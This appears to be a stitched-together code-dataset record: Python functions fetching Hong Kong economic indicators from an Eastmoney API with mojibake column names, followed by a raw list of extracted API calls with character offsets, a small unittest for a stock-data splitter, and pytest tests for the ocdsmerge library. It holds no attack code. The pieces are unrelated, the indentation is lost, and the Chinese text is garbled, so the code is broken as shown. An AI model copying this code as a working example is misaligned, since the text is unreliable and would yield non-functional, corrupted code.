"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "1",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_rate_of_unemployment() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - unemployment rate
    https://data.eastmoney.com/cjsj/foreign_8_2.html
    :return: unemployment rate
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "2",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_gbp() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - Hong Kong GDP
    https://data.eastmoney.com/cjsj/foreign_8_3.html
    :return: Hong Kong GDP
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "3",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ']) / 100
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ']) / 100
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_gbp_ratio() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - Hong Kong GDP YoY
    https://data.eastmoney.com/cjsj/foreign_8_4.html
    :return: Hong Kong GDP YoY
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "4",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_building_volume() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - number of Hong Kong building sale and purchase agreements
    https://data.eastmoney.com/cjsj/foreign_8_5.html
    :return: number of Hong Kong building sale and purchase agreements
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "5",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_building_amount() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - transaction value of Hong Kong building sale and purchase agreements
    https://data.eastmoney.com/cjsj/foreign_8_6.html
    :return: transaction value of Hong Kong building sale and purchase agreements
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "6",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ']) / 100
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ']) / 100
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_trade_diff_ratio() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - Hong Kong merchandise trade balance YoY
    https://data.eastmoney.com/cjsj/foreign_8_7.html
    :return: Hong Kong merchandise trade balance YoY
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "7",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_ppi() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - Hong Kong manufacturing PPI YoY
    https://data.eastmoney.com/cjsj/foreign_8_8.html
    :return: Hong Kong manufacturing PPI YoY
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "8",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
if __name__ == "__main__":
macro_china_hk_cpi_df = macro_china_hk_cpi()
print(macro_china_hk_cpi_df)
macro_china_hk_cpi_ratio_df = macro_china_hk_cpi_ratio()
print(macro_china_hk_cpi_ratio_df)
macro_china_hk_rate_of_unemployment_df = macro_china_hk_rate_of_unemployment()
print(macro_china_hk_rate_of_unemployment_df)
macro_china_hk_gbp_df = macro_china_hk_gbp()
print(macro_china_hk_gbp_df)
macro_china_hk_gbp_ratio_df = macro_china_hk_gbp_ratio()
print(macro_china_hk_gbp_ratio_df)
marco_china_hk_building_volume_df = macro_china_hk_building_volume()
print(marco_china_hk_building_volume_df)
macro_china_hk_building_amount_df = macro_china_hk_building_amount()
print(macro_china_hk_building_amount_df)
macro_china_hk_trade_diff_ratio_df = macro_china_hk_trade_diff_ratio()
print(macro_china_hk_trade_diff_ratio_df)
macro_china_hk_ppi_df = macro_china_hk_ppi()
print(macro_china_hk_ppi_df)
|
[
"pandas.to_numeric",
"pandas.to_datetime",
"akshare.utils.demjson.decode",
"requests.get"
] |
[((751, 783), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (763, 783), False, 'import requests\n'), ((823, 854), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (837, 854), False, 'from akshare.utils import demjson\n'), ((1043, 1071), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (1056, 1071), True, 'import pandas as pd\n'), ((1092, 1120), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (1105, 1120), True, 'import pandas as pd\n'), ((1805, 1837), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (1817, 1837), False, 'import requests\n'), ((1877, 1908), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (1891, 1908), False, 'from akshare.utils import demjson\n'), ((2097, 2125), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (2110, 2125), True, 'import pandas as pd\n'), ((2146, 2174), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (2159, 2174), True, 'import pandas as pd\n'), ((2858, 2890), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (2870, 2890), False, 'import requests\n'), ((2930, 2961), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (2944, 2961), False, 'from akshare.utils import demjson\n'), ((3150, 3178), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (3163, 3178), True, 'import pandas as pd\n'), ((3199, 3227), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (3212, 3227), True, 'import pandas as pd\n'), ((3900, 3932), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (3912, 3932), False, 'import requests\n'), ((3972, 4003), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (3986, 4003), False, 'from akshare.utils import demjson\n'), ((4966, 4998), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (4978, 4998), False, 'import requests\n'), ((5038, 5069), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (5052, 5069), False, 'from akshare.utils import demjson\n'), ((5258, 5286), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (5271, 5286), True, 'import pandas as pd\n'), ((5307, 5335), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (5320, 5335), True, 'import pandas as pd\n'), ((6028, 6060), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (6040, 6060), False, 'import requests\n'), ((6100, 6131), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (6114, 6131), False, 'from akshare.utils import demjson\n'), ((6320, 6348), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['ๅๅผ']"], {}), "(temp_df['ๅๅผ'])\n", (6333, 6348), True, 'import pandas as pd\n'), ((6369, 6397), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['็ฐๅผ']"], {}), "(temp_df['็ฐๅผ'])\n", (6382, 6397), True, 'import pandas as pd\n'), ((7094, 7126), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (7106, 7126), False, 
'import requests\n'), ((7166, 7197), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (7180, 7197), False, 'from akshare.utils import demjson\n'), ((8169, 8201), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (8181, 8201), False, 'import requests\n'), ((8241, 8272), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (8255, 8272), False, 'from akshare.utils import demjson\n'), ((8461, 8489), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['前值']"], {}), "(temp_df['前值'])\n", (8474, 8489), True, 'import pandas as pd\n'), ((8510, 8538), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['现值']"], {}), "(temp_df['现值'])\n", (8523, 8538), True, 'import pandas as pd\n'), ((9223, 9255), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (9235, 9255), False, 'import requests\n'), ((9295, 9326), 'akshare.utils.demjson.decode', 'demjson.decode', (['data_text[1:-1]'], {}), '(data_text[1:-1])\n', (9309, 9326), False, 'from akshare.utils import demjson\n'), ((9515, 9543), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['前值']"], {}), "(temp_df['前值'])\n", (9528, 9543), True, 'import pandas as pd\n'), ((9564, 9592), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['现值']"], {}), "(temp_df['现值'])\n", (9577, 9592), True, 'import pandas as pd\n'), ((4192, 4220), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['前值']"], {}), "(temp_df['前值'])\n", (4205, 4220), True, 'import pandas as pd\n'), ((4247, 4275), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['现值']"], {}), "(temp_df['现值'])\n", (4260, 4275), True, 'import pandas as pd\n'), ((7386, 7414), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['前值']"], {}), "(temp_df['前值'])\n", (7399, 7414), True, 'import pandas as pd\n'), ((7441, 7469), 'pandas.to_numeric', 'pd.to_numeric', (["temp_df['现值']"], {}), "(temp_df['现值'])\n", (7454, 7469), True, 'import pandas as pd\n'), ((1141, 1170), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (1155, 1170), True, 'import pandas as pd\n'), ((1205, 1236), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (1219, 1236), True, 'import pandas as pd\n'), ((2195, 2224), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (2209, 2224), True, 'import pandas as pd\n'), ((2259, 2290), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (2273, 2290), True, 'import pandas as pd\n'), ((3248, 3277), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (3262, 3277), True, 'import pandas as pd\n'), ((3312, 3343), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (3326, 3343), True, 'import pandas as pd\n'), ((4302, 4331), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (4316, 4331), True, 'import pandas as pd\n'), ((4366, 4397), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (4380, 4397), True, 'import pandas as pd\n'), ((5356, 5385), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (5370, 5385), True, 'import pandas as pd\n'), ((5420, 5451), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (5434, 5451), True, 'import pandas as pd\n'), ((6418, 6447), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (6432, 6447), True, 'import pandas as pd\n'), ((6482, 6513), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (6496, 6513), True, 'import pandas as pd\n'), ((7496, 7525), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (7510, 7525), True, 'import pandas as pd\n'), ((7560, 7591), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (7574, 7591), True, 'import pandas as pd\n'), ((8559, 8588), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (8573, 8588), True, 'import pandas as pd\n'), ((8623, 8654), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (8637, 8654), True, 'import pandas as pd\n'), ((9613, 9642), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['时间']"], {}), "(temp_df['时间'])\n", (9627, 9642), True, 'import pandas as pd\n'), ((9677, 9708), 'pandas.to_datetime', 'pd.to_datetime', (["temp_df['发布日期']"], {}), "(temp_df['发布日期'])\n", (9691, 9708), True, 'import pandas as pd\n')]
|
import unittest
import logging
from util.data import load_data, split_train_test_validation, make_dataset, preprocess
logger = logging.getLogger(__name__)
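# Smoke tests for util.data: load the raw asset files, preprocess a single
# symbol, split it into train/validation/test frames and window it into sequences.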
class DataTestCase(unittest.TestCase):
def setUp(self) -> None:
self.assets = load_data('../data')
self.symbol = next(iter(self.assets.keys()))
self.asset = preprocess(self.assets[self.symbol])
def test_split_data(self):
df_train, df_validation, df_test = split_train_test_validation(self.asset)
def test_make_dataset(self):
df_train, df_validation, df_test = split_train_test_validation(self.asset)
dataset = make_dataset(df_train, sequence_length=252, sequence_stride=50)
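        # 252-row windows (likely one trading year of daily data), a new window every 50 rows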
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"util.data.split_train_test_validation",
"util.data.load_data",
"util.data.preprocess",
"util.data.make_dataset",
"logging.getLogger"
] |
[((130, 157), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (147, 157), False, 'import logging\n'), ((730, 745), 'unittest.main', 'unittest.main', ([], {}), '()\n', (743, 745), False, 'import unittest\n'), ((251, 271), 'util.data.load_data', 'load_data', (['"""../data"""'], {}), "('../data')\n", (260, 271), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((346, 382), 'util.data.preprocess', 'preprocess', (['self.assets[self.symbol]'], {}), '(self.assets[self.symbol])\n', (356, 382), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((458, 497), 'util.data.split_train_test_validation', 'split_train_test_validation', (['self.asset'], {}), '(self.asset)\n', (485, 497), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((575, 614), 'util.data.split_train_test_validation', 'split_train_test_validation', (['self.asset'], {}), '(self.asset)\n', (602, 614), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n'), ((633, 696), 'util.data.make_dataset', 'make_dataset', (['df_train'], {'sequence_length': '(252)', 'sequence_stride': '(50)'}), '(df_train, sequence_length=252, sequence_stride=50)\n', (645, 696), False, 'from util.data import load_data, split_train_test_validation, make_dataset, preprocess\n')]
|
import json
import os.path
import re
from copy import deepcopy
from glob import glob
import pytest
from ocdsmerge import CompiledRelease, Merger, VersionedRelease
from ocdsmerge.exceptions import (InconsistentTypeError, MissingDateKeyError, NonObjectReleaseError,
NonStringDateValueError, NullDateValueError)
from tests import load, path, schema_url, tags
def get_test_cases():
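    # pair every compiled/versioned fixture file with the schema its merge rules come from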
test_merge_argvalues = []
simple_schema = path('schema.json')
for minor_version, schema in (('1.1', None), ('1.1', schema_url), ('1.0', schema_url), ('schema', simple_schema)):
if schema and schema.startswith('http'):
schema = schema.format(tags[minor_version])
for suffix in ('compiled', 'versioned'):
filenames = glob(path(os.path.join(minor_version, f'*-{suffix}.json')))
assert len(filenames), f'{suffix} fixtures not found'
test_merge_argvalues += [(filename, schema) for filename in filenames]
return test_merge_argvalues
@pytest.mark.vcr()
@pytest.mark.parametrize('error, data', [
(MissingDateKeyError, {}),
(NullDateValueError, {'date': None}),
(NonStringDateValueError, {'date': {}}),
(NonObjectReleaseError, '{}'),
(NonObjectReleaseError, b'{}'),
(NonObjectReleaseError, []),
(NonObjectReleaseError, tuple()),
(NonObjectReleaseError, set()),
])
def test_errors(error, data, empty_merger):
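    # each malformed release must raise the same error for both compiled and versioned merges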
for infix in ('compiled', 'versioned'):
with pytest.raises(error):
getattr(empty_merger, f'create_{infix}_release')([{'date': '2010-01-01'}, data])
if not isinstance(data, dict):
with pytest.raises(error):
empty_merger.create_compiled_release([data])
else:
release = deepcopy(data)
expected = {
'id': f"None-{data.get('date')}",
'tag': ['compiled'],
}
if data.get('date') is not None:
expected['date'] = data['date']
assert empty_merger.create_compiled_release([release]) == expected
if not isinstance(data, dict):
with pytest.raises(error):
empty_merger.create_versioned_release([data])
else:
release = deepcopy(data)
release['initiationType'] = 'tender'
expected = {
'initiationType': [{
'releaseID': None,
'releaseDate': data.get('date'),
'releaseTag': None,
'value': 'tender',
}],
}
assert empty_merger.create_versioned_release([release]) == expected
@pytest.mark.vcr()
def test_key_error(empty_merger):
with pytest.raises(KeyError) as excinfo:
empty_merger.create_compiled_release([{'date': '2010-01-01'}, {}])
message = 'The `date` field of at least one release is missing.'
assert excinfo.value.key == 'date'
assert excinfo.value.message == message
assert str(excinfo.value) == message
@pytest.mark.vcr()
@pytest.mark.parametrize('filename,schema', get_test_cases())
def test_merge(filename, schema):
merger = Merger(schema)
if filename.endswith('-compiled.json'):
infix = 'compiled'
else:
infix = 'versioned'
with open(filename) as f:
expected = json.load(f)
with open(re.sub(r'-(?:compiled|versioned)', '', filename)) as f:
releases = json.load(f)
original = deepcopy(releases)
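    # merging must not mutate the caller's list of releases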
actual = getattr(merger, f'create_{infix}_release')(releases)
assert releases == original
assert actual == expected, filename + '\n' + json.dumps(actual)
@pytest.mark.vcr()
@pytest.mark.parametrize('infix,cls', [('compiled', CompiledRelease), ('versioned', VersionedRelease)])
def test_extend(infix, cls, empty_merger):
expected = load(os.path.join('1.1', f'lists-{infix}.json'))
releases = load(os.path.join('1.1', 'lists.json'))
merged_release = getattr(empty_merger, f'create_{infix}_release')(releases[:1])
merger = cls(merged_release, merge_rules=empty_merger.merge_rules)
merger.extend(releases[1:])
assert merger.asdict() == expected
merger = cls(merged_release, schema={})
merger.extend(releases[1:])
assert merger.asdict() == expected
@pytest.mark.vcr()
@pytest.mark.parametrize('infix,cls', [('compiled', CompiledRelease), ('versioned', VersionedRelease)])
def test_append(infix, cls, empty_merger):
expected = load(os.path.join('1.1', f'lists-{infix}.json'))
releases = load(os.path.join('1.1', 'lists.json'))
merged_release = getattr(empty_merger, f'create_{infix}_release')(releases[:1])
merger = cls(merged_release, merge_rules=empty_merger.merge_rules)
merger.append(releases[1])
assert merger.asdict() == expected
merger = cls(merged_release, schema={})
    merger.append(releases[1])
assert merger.asdict() == expected
def test_inconsistent_type(empty_merger):
data = [{
"date": "2000-01-01T00:00:00Z",
"integer": 1
}, {
"date": "2000-01-02T00:00:00Z",
"integer": {
"object": 1
}
}]
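    # switching /integer from a literal to an object between releases must fail loudly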
with pytest.raises(InconsistentTypeError) as excinfo:
empty_merger.create_compiled_release(data)
assert str(excinfo.value) == "An earlier release had the literal 1 for /integer, but the current release has an object with a 'object' key" # noqa: E501
@pytest.mark.parametrize('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])
def test_merge_when_array_is_mixed(i, j, simple_merger):
data = [{
"ocid": "ocds-213czf-A",
"id": "1",
"date": "2000-01-01T00:00:00Z",
"mixedArray": [
{"id": 1},
"foo"
]
}, {
"ocid": "ocds-213czf-A",
"id": "2",
"date": "2000-01-02T00:00:00Z",
"mixedArray": [
{"id": 2},
"bar"
]
}]
output = {
'tag': ['compiled'],
'id': 'ocds-213czf-A-2000-01-02T00:00:00Z',
'date': '2000-01-02T00:00:00Z',
'ocid': 'ocds-213czf-A',
'mixedArray': [
{'id': 2},
'bar',
],
}
assert simple_merger.create_compiled_release(data) == output
actual = deepcopy(data)
expected = deepcopy(output)
del actual[i]['mixedArray'][j]
if i == 1:
del expected['mixedArray'][j]
assert simple_merger.create_compiled_release(actual) == expected, \
f'removed item index {j} from release index {i}'
@pytest.mark.parametrize('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])
def test_merge_when_array_is_mixed_without_schema(i, j, empty_merger):
data = [{
'ocid': 'ocds-213czf-A',
"id": "1",
"date": "2000-01-01T00:00:00Z",
"mixedArray": [
{"id": 1},
"foo"
]
}, {
'ocid': 'ocds-213czf-A',
"id": "2",
"date": "2000-01-02T00:00:00Z",
"mixedArray": [
{"id": 2},
"bar"
]
}]
output = {
'tag': ['compiled'],
'id': 'ocds-213czf-A-2000-01-02T00:00:00Z',
'date': '2000-01-02T00:00:00Z',
'ocid': 'ocds-213czf-A',
'mixedArray': [
{'id': 2},
'bar',
],
}
assert empty_merger.create_compiled_release(data) == output
actual = deepcopy(data)
expected = deepcopy(output)
del actual[i]['mixedArray'][j]
if i == 1:
del expected['mixedArray'][j]
if j == 0:
assert empty_merger.create_compiled_release(actual) == expected, \
f'removed item index {j} from release index {i}'
else:
with pytest.raises(AssertionError):
assert empty_merger.create_compiled_release(actual) == expected, \
f'removed item index {j} from release index {i}'
|
[
"ocdsmerge.Merger",
"copy.deepcopy",
"json.load",
"pytest.mark.vcr",
"tests.path",
"json.dumps",
"pytest.raises",
"pytest.mark.parametrize",
"re.sub"
] |
[((1030, 1047), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (1045, 1047), False, 'import pytest\n'), ((2582, 2599), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (2597, 2599), False, 'import pytest\n'), ((2952, 2969), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (2967, 2969), False, 'import pytest\n'), ((3574, 3591), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (3589, 3591), False, 'import pytest\n'), ((3593, 3700), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""infix,cls"""', "[('compiled', CompiledRelease), ('versioned', VersionedRelease)]"], {}), "('infix,cls', [('compiled', CompiledRelease), (\n 'versioned', VersionedRelease)])\n", (3616, 3700), False, 'import pytest\n'), ((4207, 4224), 'pytest.mark.vcr', 'pytest.mark.vcr', ([], {}), '()\n', (4222, 4224), False, 'import pytest\n'), ((4226, 4333), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""infix,cls"""', "[('compiled', CompiledRelease), ('versioned', VersionedRelease)]"], {}), "('infix,cls', [('compiled', CompiledRelease), (\n 'versioned', VersionedRelease)])\n", (4249, 4333), False, 'import pytest\n'), ((5338, 5402), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""i,j"""', '[(0, 0), (0, 1), (1, 0), (1, 1)]'], {}), "('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])\n", (5361, 5402), False, 'import pytest\n'), ((6425, 6489), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""i,j"""', '[(0, 0), (0, 1), (1, 0), (1, 1)]'], {}), "('i,j', [(0, 0), (0, 1), (1, 0), (1, 1)])\n", (6448, 6489), False, 'import pytest\n'), ((467, 486), 'tests.path', 'path', (['"""schema.json"""'], {}), "('schema.json')\n", (471, 486), False, 'from tests import load, path, schema_url, tags\n'), ((3079, 3093), 'ocdsmerge.Merger', 